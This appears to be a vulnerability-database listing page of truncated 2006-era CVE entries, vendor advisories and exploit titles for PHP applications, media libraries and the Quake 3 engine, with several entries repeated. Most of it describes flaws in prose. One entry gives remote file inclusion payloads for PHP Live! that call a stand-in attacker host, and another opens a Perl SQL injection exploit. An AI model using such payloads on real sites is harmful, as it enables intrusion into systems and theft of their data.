Stack and heap overflows in MODPlug Tracker/OpenMPT 1.17.02.43 and libmodplug 0.8

Luigi Auriemma Application: OpenMPT aka MODPlug Tracker http://modplug.sourceforge.net http://www.modplug.com libmodplug http://modplug-xmms.sourceforge.net Versions: OpenMPT = 1.17.02.43 and current SVN libmodplug = 0.8 and current CVS Platforms: Windows nix, BSD, XMMS plugin and others Bugs: A...

CVE-2006-3584

Dynamic variable evaluation vulnerability in index.php in Jetbox CMS 2.1 SR1 allows remote attackers to overwrite configuration variables via URL parameters, which are evaluated as PHP variable variables...

CVE-2006-3584

Dynamic variable evaluation vulnerability in index.php in Jetbox CMS 2.1 SR1 allows remote attackers to overwrite configuration variables via URL parameters, which are evaluated as PHP variable variables...

GLSA-200607-11 : TunePimp: Buffer overflow

The remote host is affected by the vulnerability described in GLSA-200607-11 TunePimp: Buffer overflow Kevin Kofler has reported a vulnerability where three stack variables are allocated with 255, 255 and 100 bytes respectively, yet 256 bytes are read into each. This could lead to buffer overflow...

TunePimp: Buffer overflow

Background The TunePimp library also referred to as libtunepimp is a development library geared towards developers who wish to create MusicBrainz enabled tagging applications. Description Kevin Kofler has reported a vulnerability where three stack variables are allocated with 255, 255 and 100 byt...

Moderate: Red Hat Security Advisory: php security update for Stronghold

An updated version of PHP that addresses several security issues is now available for Stronghold 4.0 for Enterprise Linux. This update has been rated as having moderate security impact by the Red Hat Security Response Team. PHP is an HTML-embedded scripting language. Several security issues were...

security flaw

Cross-site scripting XSS vulnerability in phpinfo info.c in PHP 5.1.2 and 4.4.2 allows remote attackers to inject arbitrary web script or HTML via long array variables, including 1 a large number of dimensions or 2 long values, which prevents HTML tags from being removed...

CVE-2006-3798

DeluxeBB 1.07 and earlier allows remote attackers to overwrite the 1 GET, 2 POST, 3 ENV, and 4 SERVER variables via the COOKIE aka COOKIE variable, which can overwrite the other variables during an extract function call, probably leading to multiple security vulnerabilities, aka "pollution of the...

Fantastic Guestbook v2.0.1 Advisory

.:. Fantastic Guestbook v2.0.1 Advisory .:. Date of written Advisory: ------------------------- July, 11 2006 Product: -------- Fantastic Guestbook v2.0.1 Vendor: ------- http://fscripts.com/ Description: ------------ Fantastic GuestBook version 2.0.1 is simple GuestBook; where remote user withou...

PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability

No description provided by source. Advisory: PHPLive 3.2 Remote Injection Vulnerability Release Date: 2006/07/23 Author: magnific Discovered: aneurysm.inc security reserach Risk: High Vendor Status: not contacted | no patch available Vendor Site: www.osicodes.com Contact: aneurysmincathotmaildotc...

PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability

Exploit for unknown platform in category web applications ============================================================ PHP Live! ----------- Execution: help.php?csspath=htt://attacker setup/header.php?csspath=htt://attacker ----------- Vendor: At the moment, there are no solutions from the vendor...

CVE-2006-3798

DeluxeBB 1.07 and earlier allows remote attackers to overwrite the 1 GET, 2 POST, 3 ENV, and 4 SERVER variables via the COOKIE aka COOKIE variable, which can overwrite the other variables during an extract function call, probably leading to multiple security vulnerabilities, aka "pollution of the...

Eskolar CMS 0.9.0.0 - Blind SQL Injection

Eskolar CMS 0.9.0.0 - Blind SQL Injection ================================================================================================== !/usr/bin/perl use IO::Socket; ==================================================================================================...

Fantastic Guestbook v2.0.1 Advisory

.:. Fantastic Guestbook v2.0.1 Advisory .:. Date of written Advisory: ------------------------- July, 11 2006 Product: -------- Fantastic Guestbook v2.0.1 Vendor: ------- http://fscripts.com/ Description: ------------ Fantastic GuestBook version 2.0.1 is simple GuestBook; where remote user withou...

CVE-2006-3390

WordPress 2.0.3 allows remote attackers to obtain the installation path via a direct request to various files, such as those in the 1 wp-admin, 2 wp-content, and 3 wp-includes directories, possibly due to uninitialized variables...

DEBIAN-CVE-2006-3390

WordPress 2.0.3 allows remote attackers to obtain the installation path via a direct request to various files, such as those in the 1 wp-admin, 2 wp-content, and 3 wp-includes directories, possibly due to uninitialized variables...

CVE-2006-3390

WordPress 2.0.3 allows remote attackers to obtain the installation path via a direct request to various files, such as those in the 1 wp-admin, 2 wp-content, and 3 wp-includes directories, possibly due to uninitialized variables...

CVE-2006-3390

WordPress 2.0.3 allows remote attackers to obtain the installation path via a direct request to various files, such as those in the 1 wp-admin, 2 wp-content, and 3 wp-includes directories, possibly due to uninitialized variables...

CentOS 3 / 4 : php (CESA-2005:831)

Updated PHP packages that fix multiple security issues are now available for Red Hat Enterprise Linux 3 and 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web...

CVE-2006-3325

The CVE affects the client component (cl_parse.c) of the id3 Quake 3 Engine 1.32c and the Icculus Quake 3 Engine (ioquake3) revision 810 and earlier. The flaw allows remote servers to send a sequence of cvar names/values that can overwrite write-protected client cvars, such as cl_allowdownload (A...